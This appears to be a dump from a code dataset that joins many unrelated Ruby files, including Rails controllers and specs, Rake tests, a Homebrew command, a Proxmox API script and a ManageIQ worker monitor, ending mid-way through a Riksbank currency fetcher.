expect(response.body).to_not be_empty
expect(assigns(:breadcrumbs)).to eq([{:name => "cloud_networks",
:url => "/cloud_network/show_list?page=&refresh=y"},
{:name => "Cloud Network (Summary)",
:url => "/cloud_network/show/#{@cloud_network.id}"}])
is_expected.to render_template(:partial => "layouts/listnav/_cloud_network")
end
it "show associated cloud_subnets" do
# TODO: Fix
skip "Broken after adding network new/edit/delete"
assert_nested_list(@cloud_network, [@cloud_subnet], 'cloud_subnets', 'All Cloud Subnets')
end
it "show associated network routers" do
assert_nested_list(@cloud_network, [@network_router], 'network_routers', 'All Network Routers')
end
it "show associated instances" do
assert_nested_list(@cloud_network, [@vm], 'instances', 'All Instances', :child_path => 'vm_cloud')
end
end
describe "#test_toolbars" do
it 'edit Cloud Network tags' do
post :button, :params => {:miq_grid_checks => to_cid(@cloud_network.id), :pressed => "cloud_network_tag"}
expect(response.status).to eq(200)
end
end
end
end
end
| 36.486111 | 115 | 0.578607 |
61a17f9f4766172bff4e6399e08c88ecd2898e45 | 500 | # this is the gem version of the controller
class Spree::Api::BraintreeClientTokenController < Spree::Api::BaseController
skip_before_action :authenticate_user
def create
if params[:payment_method_id]
gateway = Solidus::Gateway::BraintreeGateway.find_by!(id: params[:payment_method_id])
else
gateway = Solidus::Gateway::BraintreeGateway.find_by!(active: true)
end
render json: { client_token: gateway.generate_client_token, payment_method_id: gateway.id }
end
end
| 33.333333 | 95 | 0.76 |
91736d53894083744a93dd0155b60f175fbe2353 | 41 | module CheckMobi
VERSION = "1.0.5"
end
| 10.25 | 19 | 0.682927 |
383ee0d8575d1c57098a7ca727cdcead1a42551a | 4,250 | #!/usr/bin/env ruby
require 'test/unit'
require 'fileutils'
require 'rake'
require 'test/filecreation'
######################################################################
class TestFileTask < Test::Unit::TestCase
include Rake
include FileCreation
def setup
Task.clear
@runs = Array.new
FileUtils.rm_f NEWFILE
FileUtils.rm_f OLDFILE
end
def test_file_need
name = "testdata/dummy"
file name
ftask = Task[name]
assert_equal name.to_s, ftask.name
File.delete(ftask.name) rescue nil
assert ftask.needed?, "file should be needed"
open(ftask.name, "w") { |f| f.puts "HI" }
assert_equal nil, ftask.prerequisites.collect{|n| Task[n].timestamp}.max
assert ! ftask.needed?, "file should not be needed"
File.delete(ftask.name) rescue nil
end
def test_file_times_new_depends_on_old
create_timed_files(OLDFILE, NEWFILE)
t1 = Rake.application.intern(FileTask, NEWFILE).enhance([OLDFILE])
t2 = Rake.application.intern(FileTask, OLDFILE)
assert ! t2.needed?, "Should not need to build old file"
assert ! t1.needed?, "Should not need to rebuild new file because of old"
end
def test_file_times_old_depends_on_new
create_timed_files(OLDFILE, NEWFILE)
t1 = Rake.application.intern(FileTask,OLDFILE).enhance([NEWFILE])
t2 = Rake.application.intern(FileTask, NEWFILE)
assert ! t2.needed?, "Should not need to build new file"
preq_stamp = t1.prerequisites.collect{|t| Task[t].timestamp}.max
assert_equal t2.timestamp, preq_stamp
assert t1.timestamp < preq_stamp, "T1 should be older"
assert t1.needed?, "Should need to rebuild old file because of new"
end
def test_file_depends_on_task_depend_on_file
create_timed_files(OLDFILE, NEWFILE)
file NEWFILE => [:obj] do |t| @runs << t.name end
task :obj => [OLDFILE] do |t| @runs << t.name end
file OLDFILE do |t| @runs << t.name end
Task[:obj].invoke
Task[NEWFILE].invoke
assert ! @runs.include?(NEWFILE)
end
def test_existing_file_depends_on_non_existing_file
create_file(OLDFILE)
delete_file(NEWFILE)
file NEWFILE
file OLDFILE => NEWFILE
assert_nothing_raised do Task[OLDFILE].invoke end
end
# I have currently disabled this test. I'm not convinced that
# deleting the file target on failure is always the proper thing to
# do. I'm willing to hear input on this topic.
def ztest_file_deletes_on_failure
task :obj
file NEWFILE => [:obj] do |t|
FileUtils.touch NEWFILE
fail "Ooops"
end
assert Task[NEWFILE]
begin
Task[NEWFILE].invoke
rescue Exception
end
assert( ! File.exist?(NEWFILE), "NEWFILE should be deleted")
end
end
######################################################################
class TestDirectoryTask < Test::Unit::TestCase
include Rake
def setup
rm_rf "testdata", :verbose=>false
end
def teardown
rm_rf "testdata", :verbose=>false
end
def test_directory
desc "DESC"
directory "testdata/a/b/c"
assert_equal FileCreationTask, Task["testdata"].class
assert_equal FileCreationTask, Task["testdata/a"].class
assert_equal FileCreationTask, Task["testdata/a/b/c"].class
assert_nil Task["testdata"].comment
assert_equal "DESC", Task["testdata/a/b/c"].comment
assert_nil Task["testdata/a/b"].comment
verbose(false) {
Task['testdata/a/b'].invoke
}
assert File.exist?("testdata/a/b")
assert ! File.exist?("testdata/a/b/c")
end
def test_directory_win32
desc "WIN32 DESC"
FileUtils.mkdir_p("testdata")
Dir.chdir("testdata") do
directory 'c:/testdata/a/b/c'
assert_equal FileCreationTask, Task['c:/testdata'].class
assert_equal FileCreationTask, Task['c:/testdata/a'].class
assert_equal FileCreationTask, Task['c:/testdata/a/b/c'].class
assert_nil Task['c:/testdata'].comment
assert_equal "WIN32 DESC", Task['c:/testdata/a/b/c'].comment
assert_nil Task['c:/testdata/a/b'].comment
verbose(false) {
Task['c:/testdata/a/b'].invoke
}
assert File.exist?('c:/testdata/a/b')
assert ! File.exist?('c:/testdata/a/b/c')
end
end
end
| 30.357143 | 77 | 0.656235 |
7a34bc04c722199a2781e270d17d9745f22d6679 | 515 | module ActiveModel
module Serializable
def as_json(options={})
if root = options.fetch(:root, json_key)
hash = { root => serializable_object }
hash.merge!(serializable_data)
hash
else
serializable_object
end
end
def serializable_data
embedded_in_root_associations.tap do |hash|
if respond_to?(:meta) && meta
hash[meta_key] = meta
end
end
end
def embedded_in_root_associations
{}
end
end
end
| 19.807692 | 49 | 0.605825 |
01e543385dfd77a838872c91b5ed0ba4f5a34212 | 1,731 | # frozen_string_literal: true
require "hanami/utils/basic_object"
module Platform
class Matcher
class Nope < Hanami::Utils::BasicObject
def or(other, &blk)
blk.nil? ? other : blk.call
end
# rubocop:disable Style/MethodMissingSuper
# rubocop:disable Style/MissingRespondToMissing
def method_missing(*)
self.class.new
end
# rubocop:enable Style/MissingRespondToMissing
# rubocop:enable Style/MethodMissingSuper
end
def self.match(&blk)
catch :match do
new.__send__(:match, &blk)
end
end
def self.match?(os: Os.current, ci: Ci.current, engine: Engine.current, db: Db.current)
catch :match do
new.os(os).ci(ci).engine(engine).db(db) { true }.or(false)
end
end
def initialize
freeze
end
def os(name, &blk)
return nope unless os?(name)
block_given? ? resolve(&blk) : yep
end
def ci(name, &blk)
return nope unless ci?(name)
block_given? ? resolve(&blk) : yep
end
def engine(name, &blk)
return nope unless engine?(name)
block_given? ? resolve(&blk) : yep
end
def db(name, &blk)
return nope unless db?(name)
block_given? ? resolve(&blk) : yep
end
def default(&blk)
resolve(&blk)
end
private
def match(&blk)
instance_exec(&blk)
end
def nope
Nope.new
end
def yep
self.class.new
end
def resolve
throw :match, yield
end
def os?(name)
Os.os?(name)
end
def ci?(name)
Ci.ci?(name)
end
def engine?(name)
Engine.engine?(name)
end
def db?(name)
Db.db?(name)
end
end
end
| 17.31 | 91 | 0.583478 |
ffbc2feab45cd10f89c320a3bbc163491c473d6a | 3,377 | # typed: true
# frozen_string_literal: true
require "cli/parser"
require "livecheck/livecheck"
module Homebrew
extend T::Sig
module_function
sig { returns(CLI::Parser) }
def bump_args
Homebrew::CLI::Parser.new do
description <<~EOS
Display out-of-date brew formulae and the latest version available.
Also displays whether a pull request has been opened with the URL.
EOS
flag "--limit=",
description: "Limit number of package results returned."
named_args :formula
end
end
def bump
args = bump_args.parse
requested_formulae = args.named.to_formulae.presence
requested_limit = args.limit.to_i if args.limit.present?
if requested_formulae
Livecheck.load_other_tap_strategies(requested_formulae)
requested_formulae.each_with_index do |formula, i|
puts if i.positive?
if formula.head_only?
ohai formula.name
puts "Formula is HEAD-only."
next
end
package_data = Repology.single_package_query(formula.name)
retrieve_and_display_info(formula, package_data&.values&.first)
end
else
outdated_packages = Repology.parse_api_response(requested_limit)
outdated_packages.each_with_index do |(_name, repositories), i|
puts if i.positive?
homebrew_repo = repositories.find do |repo|
repo["repo"] == "homebrew"
end
next if homebrew_repo.blank?
formula = begin
Formula[homebrew_repo["srcname"]]
rescue
next
end
retrieve_and_display_info(formula, repositories)
break if requested_limit && i >= requested_limit
end
end
end
def livecheck_result(formula)
skip_result = Livecheck::SkipConditions.skip_information(formula)
if skip_result.present?
return "#{skip_result[:status]}#{" - #{skip_result[:messages].join(", ")}" if skip_result[:messages].present?}"
end
version_info = Livecheck.latest_version(
formula,
json: true, full_name: false, verbose: false, debug: false,
)
latest = version_info[:latest] if version_info.present?
return "unable to get versions" if latest.blank?
latest.to_s
end
def retrieve_pull_requests(formula)
pull_requests = GitHub.fetch_pull_requests(formula.name, formula.tap&.full_name, state: "open")
if pull_requests.try(:any?)
pull_requests = pull_requests.map { |pr| "#{pr["title"]} (#{Formatter.url(pr["html_url"])})" }.join(", ")
end
return "none" if pull_requests.blank?
pull_requests
end
def retrieve_and_display_info(formula, repositories)
current_version = formula.stable.version.to_s
repology_latest = if repositories.present?
Repology.latest_version(repositories)
else
"not found"
end
livecheck_latest = livecheck_result(formula)
pull_requests = retrieve_pull_requests(formula)
title = if current_version == repology_latest &&
current_version == livecheck_latest
"#{formula} is up to date!"
else
formula.name
end
ohai title
puts <<~EOS
Current formula version: #{current_version}
Latest Repology version: #{repology_latest}
Latest livecheck version: #{livecheck_latest}
Open pull requests: #{pull_requests}
EOS
end
end
| 26.590551 | 117 | 0.670121 |
21e1f8902d12fb47e9a7462840a13a489e8c29f6 | 143 | class Object
def initialize
end
private :initialize
def __fixnum__
Ruby.primitive :object_is_fixnum
kind_of? Fixnum
end
end
| 13 | 36 | 0.734266 |
18a4e77f4a3c087cb3bdd7c56b96705f6070453b | 250 | module Zetto::Storage::Connect
require "redis"
module RedisSingelton
@redis = Redis.new (Zetto::Config::Params.redis_connect || {}).merge({:driver => :hiredis})
class << self
def get
@redis
end
end
end
end
| 13.888889 | 95 | 0.6 |
1a6b1d8eed3db5e3a5ba296f1e834242c133be43 | 2,609 | # Proxmox API Tests
#
# Author: Jorge Juan Moratilla Porras
#
# Description: some tests with the Proxmox VE API
#require 'rubygems'
require 'rest_client'
require 'json'
require 'pp'
require 'colorize'
# Default values
@username = ENV['PVE_USER_NAME'] || 'test'
@realm = ENV['PVE_REALM'] || 'pve'
@password = ENV['PVE_USER_PASSWORD'] || 'test123'
@url_base = ENV['PVE_CLUSTER_URL'] || 'https://localhost:8006/api2/json/'
@nodename = ENV['PVE_NODE_NAME'] || 'localhost'
@storagename = ENV['PVE_STORAGE_NAME'] || 'local'
csrf_prevention_token = nil
token = nil
# RestClient logger
log = RestClient.log = []
puts "
SERVER INFO:
PVE_CLUSTER_URL => #{@url_base}
PVE_NODE_NAME => #{@nodename}
PVE_USER_NAME => #{@username}
PVE_REALM => #{@realm}
PVE_STORAGE_NAME => #{@storagename}
"
@site = RestClient::Resource.new(@url_base)
puts 'AUTH'.blue
print ' To request access: '.yellow
@site['access/ticket'].post :username=>@username,:realm=>@realm,:password=>@password do |response, request, result, &block|
if response.code == 200 then
data = JSON.parse(response.body)
ticket = data['data']['ticket']
csrf_prevention_token = data['data']['CSRFPreventionToken']
if !ticket.nil? then
# Token is a cookie coded like this one
# 'PVEAuthCookie=PVE%3Atest@pve%3A5079E676%3A%3AE5Btg[...]crcp/RzEitO/vKMvr5YpAmjBRw7HS2IA3Q%3D%3D'
token = 'PVEAuthCookie=' + ticket.gsub!(/:/,'%3A').gsub!(/=/,'%3D')
end
end
puts "#{response.code}"
end
@auth_params = {
:CSRFPreventionToken => csrf_prevention_token,
:cookie => token
}
puts 'GET'.blue
# server_get_address: Returns the IP Address of the machine to chef
def server_get_data(vmid,field)
@site["nodes/#{@nodename}/openvz/#{vmid}/status/current"].get @auth_params do |response, request, result, &block|
data = (field.match("all"))?JSON.parse(response.body)['data'] : JSON.parse(response.body)['data'][field]
end
end
# vmid_to_server_name: Use the id of the server to get the name
def vmid_to_server_name(vmid)
puts 'in vmid_to_server'
@site['cluster/resources?type=vm'].get @auth_params do |response, request, result, &block|
data = JSON.parse(response.body)['data']
puts 'received body'
result = nil
data.each {|entry|
if entry['vmid'].to_i == vmid.to_i then
result = entry['name']
end
}
result
end
end
puts 'Get IP Address: '.yellow
puts "Enter the vmid of the server"
vmid = gets.chomp
puts "Enter the field to get (all for all)"
field = gets.chomp
pp "#{vmid}: #{server_get_data(vmid,field)}"
pp "#{vmid}: #{vmid_to_server_name(vmid)}"
| 27.177083 | 124 | 0.68302 |
6aeec2d06f6daa8711a1fb4286a8b2897b673664 | 1,169 | require 'spec_helper'
describe "An object with RDF backed attributes" do
before do
class TestOne < ActiveFedora::Base
class MyMetadata < ActiveFedora::NtriplesRDFDatastream
Deprecation.silence(ActiveFedora::RDFDatastream) do
property :title, predicate: ::RDF::Vocab::DC.title do |index|
index.as :stored_searchable
end
property :date_uploaded, predicate: ::RDF::Vocab::DC.dateSubmitted do |index|
index.type :date
index.as :stored_searchable, :sortable
end
end
end
has_metadata 'descMetadata', type: MyMetadata
Deprecation.silence(ActiveFedora::Attributes) do
has_attributes :title, :date_uploaded, datastream: 'descMetadata'
end
end
end
after do
Object.send(:remove_const, :TestOne)
end
it "is able to grab the solr name" do
expect(TestOne.delegated_attributes[:title].primary_solr_name).to eq 'desc_metadata__title_tesim'
end
it "is able to grab the solr name for a date" do
expect(TestOne.delegated_attributes[:date_uploaded].primary_solr_name).to eq 'desc_metadata__date_uploaded_dtsim'
end
end
| 32.472222 | 117 | 0.694611 |
2171c8fe55366219d05abe04f039fa90267bdb9f | 11,432 | class UsersController < ApplicationController
resource_description do
short 'Site members'
path '/users'
formats ['json']
param :id, Fixnum, :desc => "User ID", :required => false
param :legacy_param, Hash, :desc => 'Deprecated parameter not documented', :show => false, :required => false do
param :resource_param, Hash, :desc => 'Param description for all methods' do
param :ausername, String, :desc => "Username for login", :required => true
param :apassword, String, :desc => "Password for login", :required => true
end
end
api_version "development"
error 404, "Missing", :meta => {:some => "metadata"}
error 500, "Server crashed for some <%= reason %>"
meta :new_style => true, :author => { :name => 'John', :surname => 'Doe' }
description <<-EOS
== Long description
Example resource for rest api documentation
These can now be accessed in <tt>shared/header</tt> with:
Headline: <%= headline %>
First name: <%= person.first_name %>
If you need to find out whether a certain local variable has been assigned a value in a particular render call,
you need to use the following pattern:
<% if local_assigns.has_key? :headline %>
Headline: <%= headline %>
<% end %>
Testing using <tt>defined? headline</tt> will not work. This is an implementation restriction.
=== Template caching
By default, Rails will compile each template to a method in order to render it. When you alter a template,
Rails will check the file's modification time and recompile it in development mode.
EOS
header :CommonHeader, 'Common header description', required: true
end
description <<-eos
= Action View Base
Action View templates can be written in several ways. If the template file has a <tt>.erb</tt> extension then it uses a mixture of ERb
(included in Ruby) and HTML. If the template file has a <tt>.builder</tt> extension then Jim Weirich's Builder::XmlMarkup library is used.
== ERB
You trigger ERB by using embeddings such as <% %>, <% -%>, and <%= %>. The <%= %> tag set is used when you want output. Consider the
following loop for names:
<b>Names of all the people</b>
<% @people.each do |person| %>
Name: <%= person.name %><br/>
<% end %>
The loop is setup in regular embedding tags <% %> and the name is written using the output embedding tag <%= %>. Note that this
is not just a usage suggestion. Regular output functions like print or puts won't work with ERB templates. So this would be wrong:
<%# WRONG %>
Hi, Mr. <% puts "Frodo" %>
If you absolutely must write from within a function use +concat+.
<%- and -%> suppress leading and trailing whitespace, including the trailing newline, and can be used interchangeably with <% and %>.
=== Using sub templates
Using sub templates allows you to sidestep tedious replication and extract common display structures in shared templates. The
classic example is the use of a header and footer (even though the Action Pack-way would be to use Layouts):
<%= render "shared/header" %>
Something really specific and terrific
<%= render "shared/footer" %>
As you see, we use the output embeddings for the render methods. The render call itself will just return a string holding the
result of the rendering. The output embedding writes it to the current template.
But you don't have to restrict yourself to static includes. Templates can share variables amongst themselves by using instance
variables defined using the regular embedding tags. Like this:
<% @page_title = "A Wonderful Hello" %>
<%= render "shared/header" %>
Now the header can pick up on the <tt>@page_title</tt> variable and use it for outputting a title tag:
<title><%= @page_title %></title>
=== Passing local variables to sub templates
You can pass local variables to sub templates by using a hash with the variable names as keys and the objects as values:
<%= render "shared/header", { :headline => "Welcome", :person => person } %>
These can now be accessed in <tt>shared/header</tt> with:
Headline: <%= headline %>
First name: <%= person.first_name %>
If you need to find out whether a certain local variable has been assigned a value in a particular render call,
you need to use the following pattern:
<% if local_assigns.has_key? :headline %>
Headline: <%= headline %>
<% end %>
Testing using <tt>defined? headline</tt> will not work. This is an implementation restriction.
=== Template caching
By default, Rails will compile each template to a method in order to render it. When you alter a template,
Rails will check the file's modification time and recompile it in development mode.
== Builder
Builder templates are a more programmatic alternative to ERB. They are especially useful for generating XML content. An XmlMarkup object
named +xml+ is automatically made available to templates with a <tt>.builder</tt> extension.
Here are some basic examples:
xml.em("emphasized") # => <em>emphasized</em>
xml.em { xml.b("emph & bold") } # => <em><b>emph & bold</b></em>
xml.a("A Link", "href" => "http://onestepback.org") # => <a href="http://onestepback.org">A Link</a>
xml.target("name" => "compile", "option" => "fast") # => <target option="fast" name="compile"\>
# NOTE: order of attributes is not specified.
Any method with a block will be treated as an XML markup tag with nested markup in the block. For example, the following:
xml.div do
xml.h1(@person.name)
xml.p(@person.bio)
end
would produce something like:
<div>
<h1>David Heinemeier Hansson</h1>
<p>A product of Danish Design during the Winter of '79...</p>
</div>
A full-length RSS example actually used on Basecamp:
xml.rss("version" => "2.0", "xmlns:dc" => "http://purl.org/dc/elements/1.1/") do
xml.channel do
xml.title(@feed_title)
xml.link(@url)
xml.description "Basecamp: Recent items"
xml.language "en-us"
xml.ttl "40"
@recent_items.each do |item|
xml.item do
xml.title(item_title(item))
xml.description(item_description(item)) if item_description(item)
xml.pubDate(item_pubDate(item))
xml.guid(@person.firm.account.url + @recent_items.url(item))
xml.link(@person.firm.account.url + @recent_items.url(item))
xml.tag!("dc:creator", item.author_name) if item_has_creator?(item)
end
end
end
end
More builder documentation can be found at http://builder.rubyforge.org.
eos
api :GET, "/users/:id", "Show user profile"
show false
formats ['json', 'jsonp']
error 401, "Unauthorized"
error :code => 404, :description => "Not Found"
param :id, Integer, :desc => "user id", :required => true
param :session, String, :desc => "user is logged in", :required => true, :missing_message => lambda { "session_parameter_is_required" }
param :regexp_param, /^[0-9]* years/, :desc => "regexp param"
param :regexp2, /\b[A-Z0-9._%+-=]+@[A-Z0-9.-]+.[A-Z]{2,}\b/i, :desc => "email regexp"
param :array_param, ["100", "one", "two", "1", "2"], :desc => "array validator"
param :boolean_param, [true, false], :desc => "array validator with boolean"
param :proc_param, lambda { |val|
val == "param value" ? true : "The only good value is 'param value'."
}, :desc => "proc validator"
param :briefer_dsl, String, "You dont need :desc => from now"
param :meta_param, String, :desc => "A parameter with some additional metadata", :meta => [:some, :more, :info]
meta :success_message => "Some message"
param :hash_param, Hash, :desc => "Hash param" do
param :dummy_hash, Hash do
param :dummy_2, String, :required => true
end
end
def show
unless params[:session] == "secret_hash"
render :plain => "Not authorized", :status => 401
return
end
unless params[:id].to_i == 5
render :plain => "Not Found", :status => 404 and return
end
render :plain => "OK"
end
def_param_group :credentials do
param :name, String, :desc => "Username for login", :required => true
param :pass, String, :desc => "Password for login", :required => true
end
def_param_group :user do
param :user, Hash, :desc => "User info", :required => true, :action_aware => true do
param_group :credentials
param :membership, ["standard","premium"], :desc => "User membership", :allow_nil => false
end
end
api :POST, "/users", "Create user"
param_group :user
param :user, Hash do
param :permalink, String
end
param :facts, Hash, :desc => "Additional optional facts about the user", :allow_nil => true
param :age, :number, :desc => "Age is just a number", :allow_blank => true
error :unprocessable_entity, 'Unprocessable Entity'
def create
render :plain => "OK #{params.inspect}"
end
api :PUT, "/users/:id", "Update an user"
param_group :user
param :comments, Array do
param :comment, String
end
def update
render :plain => "OK #{params.inspect}"
end
api :POST, "/users/admin", "Create admin user"
param_group :user, :as => :create
def admin_create
render :plain => "OK #{params.inspect}"
end
api :GET, "/users", "List users"
error :code => 401, :desc => "Unauthorized"
error :code => 404, :desc => "Not Found"
desc "List all users."
param :oauth, nil,
:desc => "Hide this global param (eg dont need auth here)"
def index
render :plain => "List of users"
end
api :GET, '/company_users', 'Get company users'
api :GET, '/company/:id/users', 'Get users working in given company'
param :id, Integer, :desc => "Company ID"
def two_urls
render :plain => 'List of users'
end
api :GET, '/users/see_another', 'Boring method'
show false
see 'development#users#create'
see 'development#users#index', "very interesting method reference"
desc 'This method is boring, look at users#create. It is hidden from documentation.'
def see_another
render :plain => 'This is very similar to create action'
end
api :GET, '/users/by_department', 'show users from a specific department'
param :department, ["finance", "operations", "sales", "marketing", "HR"], required: false, default_value: "sales"
def get_by_department
render :plain => 'nothing to see here'
end
api :GET, '/users/desc_from_file', 'desc from file'
document 'users/desc_from_file.md'
def desc_from_file
render :plain => 'document from file action'
end
api! 'Create user'
param_group :user
param :user, Hash do
param :permalink, String
end
param :facts, Hash, :desc => "Additional optional facts about the user", :allow_nil => true
def create_route
end
api :GET, '/users/action_with_headers'
header :RequredHeaderName, 'Required header description', required: true
header :OptionalHeaderName, 'Optional header description', required: false, type: 'string'
def action_with_headers
end
end
| 38.362416 | 142 | 0.649493 |
791140f5555255ef6fab38f1e6ace991b351a98e | 6,525 | module MiqServer::WorkerManagement::Monitor
extend ActiveSupport::Concern
include_concern 'Kill'
include_concern 'Kubernetes'
include_concern 'Quiesce'
include_concern 'Reason'
include_concern 'Settings'
include_concern 'Start'
include_concern 'Status'
include_concern 'Stop'
include_concern 'Systemd'
include_concern 'SystemLimits'
include_concern 'Validation'
def monitor_workers
# Clear the my_server cache so we can detect role and possibly other changes faster
self.class.my_server_clear_cache
sync_from_system
sync_monitor
# Sync the workers after sync'ing the child worker settings
sync_workers
MiqWorker.status_update_all
cleanup_failed_workers
monitor_active_workers
do_system_limit_exceeded if self.kill_workers_due_to_resources_exhausted?
end
def worker_not_responding(w)
msg = "#{w.format_full_log_msg} being killed because it is not responding"
_log.warn(msg)
MiqEvent.raise_evm_event_queue(w.miq_server, "evm_worker_killed", :event_details => msg, :type => w.class.name)
w.kill
end
def sync_workers
result = {}
MiqWorkerType.worker_class_names.each do |class_name|
begin
c = class_name.constantize
raise NameError, "Constant problem: expected: #{class_name}, constantized: #{c.name}" unless c.name == class_name
result[c.name] = c.sync_workers
result[c.name][:adds].each { |pid| worker_add(pid) unless pid.nil? }
rescue => error
_log.error("Failed to sync_workers for class: #{class_name}")
_log.log_backtrace(error)
next
end
end
result
end
def sync_from_system
if podified?
ensure_kube_monitors_started
end
cleanup_orphaned_worker_rows
if podified?
sync_deployment_settings
end
end
def cleanup_orphaned_worker_rows
if podified?
# TODO: Move to a method in the kubernetes namespace
unless current_pods.empty?
orphaned_rows = podified_miq_workers.where.not(:system_uid => current_pods.keys)
unless orphaned_rows.empty?
_log.warn("Removing orphaned worker rows without corresponding pods: #{orphaned_rows.collect(&:system_uid).inspect}")
orphaned_rows.destroy_all
end
end
end
end
def monitor_active_workers
# When k8s or systemd is operating as the worker monitor then all of the
# worker monitoring (liveness, memory threshold) is handled by those
# systems. Only when workers are run as standalone processes does MiqServer
# have to monitor the workers itself.
return if podified? || systemd?
# Monitor all remaining current worker records
miq_workers.where(:status => MiqWorker::STATUSES_CURRENT_OR_STARTING).each do |worker|
# Push the heartbeat into the database
persist_last_heartbeat(worker)
# Check the worker record for heartbeat timeouts
validate_worker(worker)
end
end
def cleanup_failed_workers
check_not_responding
check_pending_stop
clean_worker_records
if podified?
cleanup_failed_deployments
elsif systemd?
cleanup_failed_systemd_services
end
end
def podified?
MiqEnvironment::Command.is_podified?
end
def systemd?
MiqEnvironment::Command.supports_systemd?
end
def clean_worker_records
worker_deleted = false
miq_workers.each do |w|
next unless w.is_stopped?
_log.info("SQL Record for #{w.format_full_log_msg}, Status: [#{w.status}] is being deleted")
worker_delete(w.pid)
w.destroy
worker_deleted = true
end
miq_workers.reload if worker_deleted
end
def check_pending_stop
miq_workers.each do |w|
next unless w.is_stopped?
next unless worker_get_monitor_status(w.pid) == :waiting_for_stop
worker_set_monitor_status(w.pid, nil)
end
end
def check_not_responding
return if MiqEnvironment::Command.is_podified?
worker_deleted = false
miq_workers.each do |w|
next unless monitor_reason_not_responding?(w)
next unless worker_get_monitor_status(w.pid) == :waiting_for_stop
worker_not_responding(w)
worker_delete(w.pid)
w.destroy
worker_deleted = true
end
miq_workers.reload if worker_deleted
end
def monitor_reason_not_responding?(w)
[MiqServer::NOT_RESPONDING, MiqServer::MEMORY_EXCEEDED].include?(worker_get_monitor_reason(w.pid)) || w.stopping_for_too_long?
end
def do_system_limit_exceeded
MiqWorkerType.worker_class_names_in_kill_order.each do |class_name|
workers = class_name.constantize.find_current.to_a
next if workers.empty?
w = workers.sort_by { |w| [w.memory_usage || -1, w.id] }.last
msg = "#{w.format_full_log_msg} is being stopped because system resources exceeded threshold, it will be restarted once memory has freed up"
_log.warn(msg)
notification_options = {
:name => name,
:memory_usage => memory_usage.to_i,
:memory_threshold => memory_threshold,
:pid => pid
}
MiqEvent.raise_evm_event_queue_in_region(w.miq_server, "evm_server_memory_exceeded", :event_details => msg, :type => w.class.name, :full_data => notification_options)
stop_worker(w, MiqServer::MEMORY_EXCEEDED)
break
end
end
def sync_monitor
@last_sync ||= Time.now.utc
sync_interval = @worker_monitor_settings[:sync_interval] || 30.minutes
sync_interval_reached = sync_interval.seconds.ago.utc > @last_sync
roles_changed = self.active_roles_changed?
resync_needed = roles_changed || sync_interval_reached
roles_added, roles_deleted, _roles_unchanged = role_changes
if resync_needed
log_role_changes if roles_changed
sync_active_roles if roles_changed
set_active_role_flags if roles_changed
stop_apache if roles_changed && !apache_needed?
start_apache if roles_changed && apache_needed?
EvmDatabase.restart_failover_monitor_service if (roles_added | roles_deleted).include?("database_operations")
reset_queue_messages if roles_changed
@last_sync = Time.now.utc
notify_workers_of_config_change(@last_sync)
end
end
def key_store
@key_store ||= MiqMemcached.client(:namespace => "server_monitor")
end
def notify_workers_of_config_change(last_sync)
key_store.set("last_config_change", last_sync)
end
end
| 29.794521 | 172 | 0.710192 |
bb54be742c0ec0f806bbe940bd405d24d4bfecb0 | 538 | module PrependedModule
def output
puts "Outputting from the PrependedModule"
super
end
def self.prepended(base_class)
puts "Included: #{base_class}"
base_class.instance_eval do
def self.inherited(klass)
puts "Inherited: #{klass}"
klass.send(:prepend, PrependedModule)
end
end
end
end
class ParentClass
prepend PrependedModule
def output
puts "Outputting from the parent class"
end
end
class ChildClass < ParentClass
def output
puts "Outputting from the child class"
end
end
puts ChildClass.new.output
| 19.214286 | 44 | 0.760223 |
b97a2c4b7218cae5f4e5a202a6c3d540cf8a5adf | 1,817 | module Cryptoexchange::Exchanges
module Lukki
module Services
class OrderBook < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
true
end
end
def fetch(market_pair)
ctx = OpenSSL::SSL::SSLContext.new
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
output = Cryptoexchange::Cache.ticker_cache.fetch(ticker_url(market_pair)) do
HTTP.get(ticker_url(market_pair), ssl_context: ctx).parse(:json)
end
adapt(output, market_pair)
end
def ticker_url(market_pair)
"#{Cryptoexchange::Exchanges::Lukki::Market::API_URL}/trading/books?page=1&ticker=#{market_pair.base.downcase}_#{market_pair.target.downcase}"
end
def adapt(output, market_pair)
order_book = Cryptoexchange::Models::OrderBook.new
asks = output["data"].map { |n| n if n["direction"] == 1 }.compact
bids = output["data"].map { |n| n if n["direction"] == 0 }.compact
order_book.base = market_pair.base
order_book.target = market_pair.target
order_book.market = Lukki::Market::NAME
order_book.asks = asks.nil? ? nil : adapt_orders(asks)
order_book.bids = bids.nil? ? nil : adapt_orders(bids)
order_book.timestamp = nil
order_book.payload = output
order_book
end
def adapt_orders(orders)
orders.collect do |order_entry|
Cryptoexchange::Models::Order.new(price: order_entry["price"].to_f,
amount: order_entry["amount"].to_f,
timestamp: nil)
end
end
end
end
end
end
| 34.283019 | 152 | 0.576225 |
08e13eef03b154e6e4481ac29908a0ff89e70d34 | 741 | ResendCancelInvitationMutation = GraphQL::Relay::Mutation.define do
name 'ResendCancelInvitation'
input_field :email, !types.String
input_field :action, !types.String
return_field :success, types.Boolean
return_field :team, TeamType
resolve -> (_root, inputs, _ctx) {
user = User.find_user_by_email(inputs[:email])
if user.nil?
raise ActiveRecord::RecordNotFound
else
case inputs[:action]
when 'cancel'
User.cancel_user_invitation(user)
when 'resend'
tu = user.team_users.where(team_id: Team.current.id).last
tu.update_columns(created_at: Time.now)
user.send_invitation_mail(tu.reload)
end
{ success: true, team: Team.current }
end
}
end
| 25.551724 | 67 | 0.68556 |
f8cca56d0e59e26ed08d6af3f9df90e919f91739 | 1,607 | module RiksbankCurrency
# Get the latest rates that will be correct for the current day.
#
# @see https://swea.riksbank.se/sweaWS/docs/api/call/getLatestInterestAndExchangeRates.htm
class TodayFetcher
def rate_date
@rate_date ||=
begin
response.xpath("//resultrows/date").map do |date_node|
Helper.parse_date(date_node.content)
end.max
end
end
def to_hash
rates = {}
response.xpath("//series").each do |series|
currency = Helper.currency_from_seriesid(series.at_xpath('seriesid').content)
if (rate = series.at_xpath('resultrows/value').content).length > 0
unit = BigDecimal(series.at_xpath('unit').content)
rate = BigDecimal(rate)
rates[currency] = rate / unit
else
next
end
end
rates
end
def response
@response ||= Request.call(xml_template, 'getLatestInterestAndExchangeRates')
end
protected
def series
RiksbankCurrency.currencies.map do |currency|
id = Helper.currency_to_seriesid(currency)
"<seriesid>#{id}</seriesid>"
end.join('')
end
def xml_template
<<-XML
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:xsd="http://swea.riksbank.se/xsd">
<soap:Header/>
<soap:Body>
